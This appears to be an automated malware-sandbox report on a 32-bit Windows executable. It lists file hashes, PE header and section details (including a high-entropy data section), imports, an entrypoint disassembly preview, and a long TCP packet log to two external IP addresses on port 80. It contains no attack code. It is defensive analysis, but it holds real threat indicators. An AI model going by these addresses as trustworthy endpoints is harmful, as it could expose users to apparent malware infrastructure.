SSDEEP:	6144:oKFyXCCNTdMc9uzUCEJ/z1qWYHR+qvkqs3PZ5E:NFoC+ZUzl+RWR+1qs/s
TLSH:	7B34F1123CD18932C93E74718C71CA5277BFB8816672D94A76FC1AAE5F626C06E30397
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....Mb...........................

File Icon


Icon Hash:	3370686068686869

Static PE Info

General

Entrypoint:	0x404be7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x624D8102 [Wed Apr 6 12:01:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	c9c09dee9cb4e9617f155f42be2e2cc0

Entrypoint Preview

Instruction
call 00007F8CE8759A6Bh
jmp 00007F8CE87565FDh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F8CE87567A6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F8CE87567D0h
test ecx, 00000003h
jne 00007F8CE8756771h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F8CE875676Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F8CE87567B4h
test ah, ah
je 00007F8CE87567A6h
test eax, 00FF0000h
je 00007F8CE8756795h
test eax, FF000000h
je 00007F8CE8756784h
jmp 00007F8CE875674Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
cmp ecx, dword ptr [00435A7Ch]
jne 00007F8CE8756784h
rep ret
jmp 00007F8CE8759A53h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe0ec	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x191000	0x4bf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1210	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2c78	0x18	.text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2c30	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdbe4	0xdc00	False	0.4849609375	data	5.899490920975358	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xf000	0x181d1c	0x27600	False	0.9495845734126984	data	7.865940586372942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x191000	0x4bf8	0x4c00	False	0.5913342927631579	data	5.603732133139699	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1912b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
RT_ICON	0x191b58	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216
RT_ICON	0x194100	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_STRING	0x1953a8	0x42	data
RT_STRING	0x1953f0	0x280	data
RT_STRING	0x195670	0x3ce	data
RT_STRING	0x195a40	0x1b2	data
RT_ACCELERATOR	0x1951d8	0x80	data
RT_GROUP_ICON	0x1951a8	0x30	data
RT_VERSION	0x195268	0x140	MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
None	0x195258	0xa	data

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, InterlockedPushEntrySList, GetConsoleAliasesA, ReadFile, ReadConsoleW, GetVolumeInformationA, GetComputerNameA, LocalFree, InterlockedDecrement, SetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeA, FindNextChangeNotification, CopyFileExA, MoveFileWithProgressW, VerifyVersionInfoW, LocalSize, FileTimeToDosDateTime, DebugBreak, GlobalGetAtomNameA, IsBadWritePtr, FindResourceA, GetComputerNameExA, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthW, GetVolumeNameForVolumeMountPointA, DeleteVolumeMountPointA, GetCPInfo, GetQueuedCompletionStatus, MoveFileWithProgressA, CopyFileA, lstrcpynW, WriteConsoleW, GetBinaryTypeW, WriteConsoleOutputA, GetCommandLineA, InterlockedIncrement, CreateActCtxW, FormatMessageA, GetModuleHandleW, GetModuleHandleA, EnterCriticalSection, GetStringTypeExA, OpenMutexW, FindResourceW, RtlCaptureContext, InterlockedExchange, InitializeCriticalSectionAndSpinCount, DeleteFiber, InterlockedExchangeAdd, EnumDateFormatsA, GetPrivateProfileStructA, GetNamedPipeHandleStateW, RegisterWaitForSingleObject, LocalAlloc, QueryMemoryResourceNotification, SetLastError, GetProcessPriorityBoost, GetMailslotInfo, HeapWalk, SetFilePointer, SetConsoleMode, RaiseException, RtlUnwind, GetLastError, MoveFileA, DeleteFileA, GetStartupInfoA, HeapAlloc, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, LCMapStringA, LCMapStringW
USER32.dll	CharUpperBuffW
WINHTTP.dll	WinHttpCreateUrl

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 17:42:17.356427908 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:17.383599997 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:17.383812904 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:17.386774063 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:17.413696051 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:19.242346048 CEST	80	49710	208.67.104.97	192.168.2.6
Oct 3, 2022 17:42:19.242492914 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:42:20.319062948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.346203089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.346492052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.348063946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375190973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375627995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375648975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375668049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375686884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375704050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375720978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375737906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375756979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375758886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375775099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375793934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.375802994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375824928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.375883102 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.402920961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.402972937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403003931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403034925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403064013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403094053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403120995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403122902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403172016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403172016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403194904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403202057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403225899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403232098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403245926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403263092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403274059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403292894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403321028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403321028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403343916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403351068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403366089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403381109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403390884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403409958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403424978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403439045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403449059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403467894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403480053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403497934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403511047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403527021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.403537989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.403568029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.430773973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430810928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430833101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430860043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430892944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430913925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430936098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430952072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430974007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.430974007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.430995941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431014061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431032896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431039095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431058884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431062937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431086063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431091070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431108952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431124926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431144953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431154966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431173086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431178093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431200027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431212902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431221962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431231022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431245089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431251049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431267977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431272030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431289911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431302071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431310892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431325912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431334019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431355953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431361914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431379080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431396008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431401014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431423903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431427002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431446075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431459904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431467056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431488991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431495905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431510925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431530952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431533098 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431554079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431564093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431576967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431596041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431598902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431621075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431628942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431643009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431663036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431663990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431694984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431699038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.431732893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.431756020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.458795071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458831072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458848953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458862066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458888054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458901882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458921909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458961010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458980083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.458986998 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.458997011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459017992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459038019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459055901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459074020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459079981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459095001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459105015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459115028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459126949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459134102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459152937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459161043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459172010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459189892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459192991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459208012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459214926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459228039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459247112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459250927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459264994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459281921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459285021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459304094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459304094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459317923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459336996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459337950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459356070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459368944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459374905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459393024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459397078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459414005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459430933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459433079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459450960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459450960 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459469080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459487915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459487915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459506035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459523916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459523916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459542036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459548950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459561110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459578991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459579945 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459597111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459610939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459616899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459635019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459647894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459652901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459672928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459681034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459692955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459702015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459712029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459729910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459737062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459749937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459768057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459770918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459785938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459791899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459805012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459830999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459831953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459850073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459867954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459868908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459887028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459891081 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459904909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459922075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459923029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459943056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459950924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.459960938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459979057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.459995985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460010052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460010052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460016966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460035086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460046053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460053921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460072041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460079908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460089922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460102081 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460108042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460127115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460136890 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460144043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460161924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460174084 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460180044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460196972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460200071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460216045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460221052 CEST	49711	80	192.168.2.6	85.31.46.167
